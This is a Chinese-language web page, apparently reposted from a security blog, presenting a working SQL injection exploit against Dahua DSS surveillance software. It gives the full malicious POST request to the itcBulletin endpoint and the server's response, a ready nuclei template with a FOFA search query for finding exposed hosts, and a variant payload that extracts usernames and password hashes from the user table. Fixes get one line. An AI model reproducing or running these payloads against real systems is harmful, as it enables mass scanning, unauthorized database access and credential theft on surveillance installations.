大华 DSS SQL 注入漏洞(附exp) |
您所在的位置:网站首页 › dss视频监控app › 大华 DSS SQL 注入漏洞(附exp) |
05 — 漏洞复现 向靶场发送如下数据包,计算md5(102103122) POST /portal/services/itcBulletin?wsdl HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Connection: closeContent-Length: 345Accept-Encoding: gzip (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1响应内容如下 HTTP/1.1 500 Internal Server ErrorConnection: closeContent-Length: 581Content-Type: text/xml;Date: Tue, 19 Dec 2023 10:13:48 GMTServer: Apache-Coyote/1.1soap:ServerPreparedStatementCallback; uncategorized SQLException for SQL [select t.* from C_BULLETIN t where t.NETMARKING in ( (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1 ) ]; SQL state [HY000]; error code [1105]; XPATH syntax error: '~6cfe798ba8e5b85feb50164c59f4bec'; nested exception is java.sql.SQLException: XPATH syntax error: '~6cfe798ba8e5b85feb50164c59f4bec'响应数据包中包含6cfe798ba8e5b85feb50164c59f4bec 漏洞复现成功 06 — nuclei poc poc文件内容如下 id: dahua-dss-itcBulletin-sqliinfo: name: 大华DSS itcBulletin SQL注入漏洞 author: fgz severity: high description: 大华DSS数字监控系统itcBulletin接口存在SQL注入漏洞,攻击者可以利用该漏洞获取数据库敏感信息。 metadata: fofa-query: app="dahua-DSS"requests: - raw: - |+ POST /portal/services/itcBulletin?wsdl HTTP/1.1 Host: {{Hostname}} Accept-Encoding: gzip User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1 matchers-condition: and matchers: - type: dsl dsl: - 'status_code==500 && contains(body,"error code [1105]") && contains(body,"6cfe798ba8e5b85feb50164c59f4bec")'运行POC .nuclei.exe -t dahua-dss-itcBulletin-sqli.yaml -l dahua-dss.txt07 — 漏洞利用 利用漏洞获取系统的用户名密码,将poc中的md5()函数替换成SQL语句即可 POST /portal/services/itcBulletin?wsdl HTTP/1.1Host: your-ipUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Accept-Encoding: gzip (updatexml(1,concat(0x7e,(select substr(group_concat(login_name, " ",login_pass),1,30) from sys_user),0x7e),1))) and (1=1响应数据包如下 HTTP/1.1 500 Internal Server ErrorConnection: closeContent-Length: 643Content-Type: text/xml;charset=ISO-8859-1Date: Tue, 19 Dec 2023 11:46:52 GMTServer: Apache-Coyote/1.1soap:ServerPreparedStatementCallback; uncategorized SQLException for SQL [select t.* from C_BULLETIN t where t.NETMARKING in ( (updatexml(1,concat(0x7e,(select substr(group_concat(login_name, " ",login_pass),1,30) from sys_user),0x7e),1))) and (1=1) ]; SQL state [HY000]; error code [1105]; XPATH syntax error: '~system 8e173a7bb9ec8156d772cf4~'; nested exception is java.sql.SQLException: XPATH syntax error: '~system 8e173a7bb9ec8156d772cf4~'其中system为用户名 8e173a7bb9ec8156d772cf4为密码的MD5 07 — 修复建议 升级到最新版本或者部署WAF进行防护。 08 — 福利领取 关注公众号,在公众号主页点发消息发送关键字免费领取。 后台发送【工具】获取渗透工具包 后台发送【电子书】获取电子书资源包 |
今日新闻 |
推荐新闻 |
CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3 |